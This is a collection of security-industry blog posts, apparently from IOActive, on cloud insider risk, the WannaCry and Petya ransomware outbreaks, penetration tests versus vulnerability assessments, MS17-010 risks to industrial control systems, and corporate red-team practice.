Fernando Arnaboldi appeared at Ruxcon to present defensive techniques that can be embedded in server-side applications. The techniques described are included in a specification, along with sample implementations for multiple programming languages.
INSIGHTS | September 7, 2017

The Other Side of Cloud Data Risk

What I’m writing here isn’t about whether you should be in the cloud or not. That’s a complex question, it’s highly dependent on your business, and experts could still disagree even after seeing all of the inputs.

What I want to talk about is two distinct considerations when looking at the risk of moving your entire company to the cloud. There are many companies doing this, especially in the Bay Area. CRM, HR, Email—it’s all cloud, and the number of cloud vendors totals in the hundreds, perhaps even thousands.

We’re pretty familiar with one type of risk, which is that between the internet and the cloud vendor. That list of risks looks something like this:

  • The vendor is compromised due to a vulnerability
  • An insider at the vendor leaves with a bunch of data and sells or posts it
  • Someone at the vendor misconfigures something and the internet finds it

The list goes on from there.

But the side of that cloud/vendor risk that companies don’t seem to be as aware of is their own insider access: while one risk is that the vendor does something stupid with your data, another is that your own employees do the same.

Considerations around insider access are numerous:

  • Employees with way too much access to sales, customer, employee, financial, and other types of data
  • No ability to know whether that data is being downloaded, by whom, and how much
  • No ability to detect that data on endpoints
  • No control of which endpoints access the data
  • No ability to control where that data is then sent

The situation in so many cloud-based companies is that they enable business by providing access to these cloud systems, but they don’t control which endpoints can reach that data. Users may get in through web apps, mobile apps, or other means. It’s application-based authentication that doesn’t know (or care) what type of device is being used: a 12-year-old desktop with XP on it, or an old Android device that hasn’t been updated in months or years.

Even worse is the false sense of security gained from spending millions on firewall infrastructure, while a massive percentage of the workforce either doesn’t work at the office or doesn’t hairpin back into the office through a VPN. The modern workforce—especially in these types of environments—increasingly connects from a laptop at home (or at a co-work site or coffee shop) directly to the backend, which is the cloud.

This puts us increasingly in a situation where most of the NetSec products we’ve been investing in for the last 15 years are moot, for the simple reason that fewer and fewer people are using the corporate network.

For cloud-based companies especially, it’s time to start thinking about AuthZ and AuthN from not just the user and app perspective, but from a complete endpoint perspective. What is the device, OS, patch levels, malware controls, etc., combined with the user auth, for any given access to an application and the data within?

The risk from a compromised vendor is significant, but it’s also largely outside of a company’s control. Anyone who’s been in security for a while knows that there are thousands of companies with X, Y, or Z certifications, or positive audit results when they absolutely shouldn’t have passed. It’s really hard to know how safe your data is when it’s sitting with hundreds of cloud vendors.

What you can do is to get better control over what your own people are doing with that same data, and that starts with understanding who’s accessing it, and from what devices.


INSIGHTS | June 28, 2017

WannaCry vs. Petya: Keys to Ransomware Effectiveness

With WannaCry and now Petya, we’re beginning to see how and why the new strain of ransomware worms is evolving and growing far more effective than previous versions.

I think there are 3 main factors: Propagation, Payload, and Payment.*

  1. Propagation: You ideally want to be able to spread using as many different types of techniques as you can.
  2. Payload: Once you’ve infected the system you want to have a payload that encrypts properly, doesn’t have any easy bypass to decryption, and clearly indicates to the victim what they should do next.
  3. Payment: You need to be able to take in money efficiently and then actually decrypt the systems of those who pay. This piece is crucial; otherwise, people will quickly learn they can’t get their files back even if they do pay, and they’ll be inclined to just start over.


WannaCry vs. Petya

WannaCry used SMB as its main spreading mechanism, and its payment infrastructure lacked the ability to scale. It also had a kill switch, which was famously triggered and halted further propagation.

Petya, on the other hand, appears to be much more effective at spreading since it’s using both EternalBlue and credential sharing / PSEXEC to infect more systems. This means it can harvest working credentials and spread even if the new targets aren’t vulnerable to an exploit.


[NOTE: This is early analysis so some details could turn out to be different as we learn more.]

What remains to be seen is how effective the payload and payment infrastructures are on this one. It’s one thing to encrypt files, but it’s something else entirely to decrypt them.

The other important unknown at this point is if Petya is standalone or a component of a more elaborate attack. Is what we’re seeing now intended to be a compelling distraction?
There have been some reports indicating these exploits were utilized by a sophisticated threat actor against the same targets prior to WannaCry, so it’s possible that WannaCry was poorly designed on purpose. Either way, we’re advising clients to investigate whether there is any evidence of a more strategic use of these tools in the weeks leading up to Petya hitting.

*Note: I’m sure there are many more thorough ways to analyze the efficacy of worms. These are just three that came to mind while reading about Petya and thinking about it compared to WannaCry.

INSIGHTS | May 20, 2017

Post #WannaCry Reaction #127: Do I Need a Pen Test?

In the wake of WannaCry and other recent events, everyone from the Department of Homeland Security to my grandmother is recommending penetration tests as a silver bullet to prevent falling victim to the next cyberattack. But a penetration test is not a silver bullet, nor is it universally what is needed for improving the security posture of an organization. There are several key factors to consider. So I thought it might be good to review the difference between a penetration test and a vulnerability assessment since this is a routine source of confusion in the market. In fact, I’d venture to say that while there is a lot of good that comes from a penetration test, what people actually more often need is a vulnerability assessment.

First, let’s get the vocabulary down:

Vulnerability Assessments

Vulnerability Assessments are designed to yield a prioritized list of vulnerabilities and are generally best for organizations that understand they are not where they want to be in terms of security. The customer already knows they have issues and needs help identifying and prioritizing them.

With a vulnerability assessment, the more issues identified the better, so naturally, a white box approach should be embraced when possible. The most important deliverable of the assessment is a prioritized list of vulnerabilities identified (and often information on how best to remediate).

Penetration Tests

Penetration Tests are designed to achieve a specific, attacker-simulated goal and should be requested by organizations that are already at their desired security posture. A typical goal could be to access the contents of the prized customer database on the internal network or to modify a record in an HR system.

The deliverable for a penetration test is a report on how security was breached in order to reach the agreed-upon goal (and often information on how best to remediate).

Why does it matter? In short, you get what you pay for. 

No organization has an unlimited budget for security. Every security dollar spent is a trade-off. For organizations that do not have a highly developed security program in place, vulnerability assessments will provide better value in terms of knowing where you need to improve your security posture even though pen tests are generally a less expensive option. A pen test is great when you know what you are looking for or want to test whether a remediation is working and has solved a particular vulnerability.

Here is a quick chart to help determine what your organization may need.

Organizational Security Program Maturity Level
  • Vulnerability Assessment: Low to Medium. Usually requested by organizations that already know they have issues, and need help getting started.
  • Penetration Test: High. The organization believes their defenses to be strong, and wants to test that assertion.

Goal
  • Vulnerability Assessment: Attain a prioritized list of vulnerabilities in the environment so that remediation can occur.
  • Penetration Test: Determine whether a mature security posture can withstand an intrusion attempt from an advanced attacker with a specific goal.

Focus
  • Vulnerability Assessment: Breadth over depth.
  • Penetration Test: Depth over breadth.

So what now?

Most security programs benefit from utilizing some combination of security techniques. These can include any number of tasks, including penetration tests, vulnerability assessments, bug bounties, white/grey/black testing, code review, and/or red/blue/purple team exercises.

We’ll peel back the different tools and how you might use them in a future post. Until then, take a look at your needs and make sure the steps you take in the wake of WannaCry and other security incidents are more than just reacting to the crisis of the week.

INSIGHTS | May 16, 2017

#WannaCry: Examining Weaponized Malware

Attribution: You Keep Using That Word, I Do Not Think It Means What You Think It Means…

In internal discussions in the virtual halls of IOActive this morning, there was much talk about the collective industry’s rush to blame or attribution over the recent WanaCry/WannaCrypt ransomware outbreaks. Twitter was lit up on #WannaCry and #WannaCrypt, and even Microsoft got into the action, stating, “We need governments to consider the damage to civilians that comes from hoarding these vulnerabilities and the use of these exploits.”

Opinions for blame and attribution spanned the entire spectrum of response, from the relatively sane…

…to the sublimely sarcastic.

As a community, we can talk and debate who did what, and why, but in the end it really doesn’t matter. Literally none (well, almost none) of us outside the government or intelligence communities have any impact on the discussion of attribution. Even for the government, attribution is hard to nearly impossible to do reliably, and worse, it is now politicized and drawn out in the court of public opinion. The digital ink on malware or Internet attacks is hardly even dry, yet experts are already calling out “Colonel Mustard, Lead Pipe, Study” before we even know what the malware is fully capable of doing. We insist on having these hyperbolic discussions where we wax poetic about the virtues of the NSA vs. Microsoft vs. state actors.

It’s more important to focus on the facts: what can be observed in the behavioral characteristics of the malware, and what organizations need to do to prevent infection now and in the future.

How people classify them varies, but there are essentially three different classes of weaponized malware:

  • Semi-automatic/automatic kits that exploit “all the things.” These are the Confickers, Code Reds, SQL Slammers, and Melissas of the world
  • Manual/point-target kits that exploit “one thing at a time.” These are the types of kits that Shadow Brokers dropped. Think of these as black market, crew-served weapons, such as MANPADS
  • Automatic point-target exploit kits that exploit based on specific target telemetry AND are remotely controllable in flight. This includes Stuxnet. Think of these as the modern cyber equivalent of cruise missiles

Nation state toolkits are typically elegant. As we know, ETERNALBLUE was part of a greater framework/toolkit. Whoever made WannaCrypt/Cry deconstructed a well-written (by all accounts thus far), complex mechanism for point-target use and made a blunt-force weapon out of part of it. Of the three types above, nation states moved on from the first one over a decade ago because such kits aren’t controllable and don’t meet the clandestine nature that today’s operators require. Nation states typically prefer type two; however, this requires bi-directional, fully routed IP connectivity to function correctly. When you cannot get to the network or asset in question, type three is your only option. In that instance, you build in the targeting telemetry for the mission and send it on its way. This requires a massive amount of upfront HUMINT and SIGINT for targeting telemetry. As you can imagine, the weaponized malware in type three is both massive in size and in sunk cost.

WannaCry/WanaCrypt is certainly NOT type two or three, and it appears that corners were cut in creating the malware. The community was very quick to actively reverse the package, and it doesn’t appear that any major anti-reversing or anti-tampering methods were used. Toss in the well-publicized and rudimentary “kill switch” component, and this appears almost sloppy and lacking in conviction. I can think of at least a dozen more elegant command and control functions it could have implemented to leave control in the hands of the malware author. Anyone with reverse engineering skills would eventually find this “kill switch” and disable it using a hex editor to modify a JMP instruction. Compare this to Conficker, which had password brute-forcing capabilities as well as the ability to pivot after installation and infect other hosts without the use of exploits, but rather through simple login after passwords were identified.

This doesn’t mean that WannaCry/WanaCrypt is not dangerous; on the contrary, depending upon the data impacted, its consequences could be devastating. For example, impacting the safety builder controlling Safety Instrumented Systems, or locking operators out of Human Machine Interfaces (HMIs, the computers used in industrial control environments), could lead to dangerous process failures. Likewise, loss of regulatory data that exists in environmental control systems, quality systems, historians, or other critical ICS assets could open a facility up to regulatory action. Critical infrastructure asset owners typically have horrific patch cycles with equally appalling backup and disaster recovery strategies. And if businesses are hit with this attack and lose critical data, it may open a door to legal action for failure to follow due care and diligence in protecting these systems. It’s clear this ransomware is going to be a major pain for quite some time. Due care and preventative strategies should be taken by asset owners everywhere to keep their operations up and running in the safest and most secure manner possible.

It really doesn’t do much good to philosophically discuss attribution, or play as a recent hashtag calls it, the #smbBlameGame. It’s relatively clear that this is amateur hour in the cybercrime space. With a lot of people panicking about this being the “next cyber cruise missile” or equivalent, I submit that this is more akin to digital malaria.

INSIGHTS | May 13, 2017

We’re gonna need a bigger boat….

A few weeks ago, back in mid-March (2017), Microsoft issued a security bulletin (MS17-010) and patch for a vulnerability that had yet to be publicly disclosed or referenced. According to the bulletin, “the most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server. This security update is rated Critical for all supported releases of Microsoft Windows.”

Normally, when Microsoft issues a patch or security bulletin, there is an acknowledgment of the disclosure on their website. The acknowledgments page is, at this point, an interesting one to visit: https://technet.microsoft.com/en-us/library/security/mt745121.aspx

Notice anything?  MS17-010 is conspicuous in its absence.


It is often said that timing is everything, and in this case Microsoft beat the clock. Exactly one month later, on 14 April 2017, ShadowBrokers dropped the fifth in a series of leaks supposedly associated with the NSA, which included an exploit codenamed ETERNALBLUE. Flashing forward to today, almost one full month later, this payload has been weaponized and, over the last few hours, has been used in a rash of ransomware attacks throughout the UK, mainland Europe, and western Asia.
  • UK Hospitals Hit in Widespread Ransomware Attack
  • NSA Exploit Used by Wannacry Ransomware in Global Explosion
  • Spain Ransomware Outbreak


Considering the timing, one could be inclined to consider that this was not just Microsoft’s good fortune.


While pretty much the entire wired world is rushing to patch MS17-010, even though that patch has been out for almost two months, one technology area is cause for particular concern when it comes to ransomware: global industrial environments.

Historically, general-purpose, run-of-the-mill malware that leverages SMB and NetBIOS interfaces has been particularly troublesome in industrial environments, with many systems remaining infected years later. Besides ICS environments being in an operational state that complicates the life of those seeking to patch them, some of these legacy systems often use a protocol called Object Linking and Embedding for Process Control (OLE for Process Control, or OPC for short). OPC Classic (a legacy protocol implementation) relies on the Distributed Component Object Model (DCOM), which makes heavy use of the Distributed Computing Environment / Remote Procedure Calls (DCE/RPC) protocol.

In addition to NetBIOS and depending on both configuration and implementation, SMB is one of the interfaces that can be leveraged by these other services. Because both NetBIOS and SMB are needed in some manner by ICS software and protocols, many ICS systems have been negatively impacted by malware leveraging SMB and NetBIOS attacks reaching back well over a decade.


Consider the major, well-known examples of malware impacting the ICS space. In November of 2008, the first variant of Conficker was publicly identified, and due to the ICS requirement of keeping NetBIOS and SMB ports open, Conficker is still found to this day. Conficker exploited MS08-067 and, due to its password brute-forcing capability, is incredibly resilient to remediation attempts at the system level. Another major example that utilized the attack vector in MS08-067 was Stuxnet. We all know how that turned out. MS17-010 has the potential to be every bit as damaging, and in some ways much worse.

With the WannaCry/WanaCrypt ransomware in the wild, crossing into industrial control systems would be particularly devastating. Systems requiring real-time interfacing and control influence over physical assets could face safety-critical shutdown, or worse. Thinking about critical services to modern society (power, water, wastewater, etc.), there is a real possibility, perhaps for the first time ever, that critical services could be suspended due to ransomware. It may be time to rethink critical infrastructure cybersecurity engineering, because if MS17-010-exploiting malware variants are successful, we are clearly doing something wrong.
INSIGHTS | September 1, 2016

Five Attributes of an Effective Corporate Red Team

After talking recently with colleagues at IOActive as well as some heads of industry-leading red teams, we wanted to share a list of attributes that we believe are key to any effective Red Team.

[ NOTE: For debate about the relevant terminology, we suggest Daniel’s post titled The Difference Between Red, Blue, and Purple Teams. ]

To be clear, we think there can be significant variance in how Red Teams are built and managed, and we believe there are likely multiple routes to success. But we believe there are a few key attributes that all (or at least most) corporate Red Teams should have as part of their program. These are:

  1. Organizational Independence
  2. Defensive Coordination
  3. Continuous Operation
  4. Adversary Emulation
  5. Efficacy Measurement

Let’s look at each of these.

Organizational Independence is the requirement that the Red Team be able to effectively act as a real-world attacker in terms of scope, tools, and techniques employed. Many organizations restrict their Red Teams to such a degree that they’re basically impotent, which in turn lulls the company into a false sense of security.

Defensive Coordination is the requirement that Red Teams regularly interact with their counterparts on the defensive side to ensure the organization is learning from their activities. If a Red Team is effective on its own but doesn’t share its knowledge and successes with the defense in order to make it stronger, then the Red Team has lost sight of its purpose.

Continuous Operation is the requirement that the organization remain under constant, rolling attack by the Red Team, which is the polar opposite of short, penetration-test style engagements. Red Teams should operate through campaigns that span weeks or months in duration, and both the defensive teams and the general user population should know that at any moment, of any day, they could be targeted by both a Red Team campaign of some sort, or by a real attacker.

Adversary Emulation is the requirement that Red Team campaigns should be regularly updated based on the actual tools, techniques, and processes employed by real-world attackers. If cyber-criminals are doing X this quarter, let’s emulate that. If we’re seeing some state actors doing Y this year, let’s emulate that. If you’re not simulating—to some significant degree—the techniques being used by actual attackers, the Red Team is providing questionable value.

Efficacy Measurement is the requirement that Red Teams know how effective they are at improving the security posture of the organization. If they can’t tell a clear story about how the defenses are improving, i.e., that it’s becoming increasingly difficult to compromise, move laterally, and achieve attacker goals, then the organization is getting limited value from any work that’s being done.

Summary

Here’s a pointed summary of those attributes:

  • If your group is significantly restricted in its scope and capabilities by the organization, you probably don’t have an effective Red Team
  • If your group doesn’t regularly work hand-in-hand with the defensive side of the organization in order to improve the organization’s security posture, you probably don’t have an effective Red Team
  • If your internal or external service operates based on projects that happen once in a while rather than being staggered and continuous, you probably don’t have an effective Red Team
  • If you aren’t constantly updating your attack campaigns based on new intelligence on actual threat actors, you probably don’t have an effective Red Team
  • If you aren’t closely monitoring the effectiveness of the attack campaigns (and the responses to them by the defense) over time, you probably don’t have an effective Red Team

There are many other components of a solid Red Team that were not mentioned—top-end malware kits, elite security talent, deep understanding of the attacker mindset, etc.—but we think these five components are both most fundamental and most lacking.

As always, we would love to hear from other security types who might have a differing opinion. All of our positions are subject to change through exposure to compelling arguments and/or data.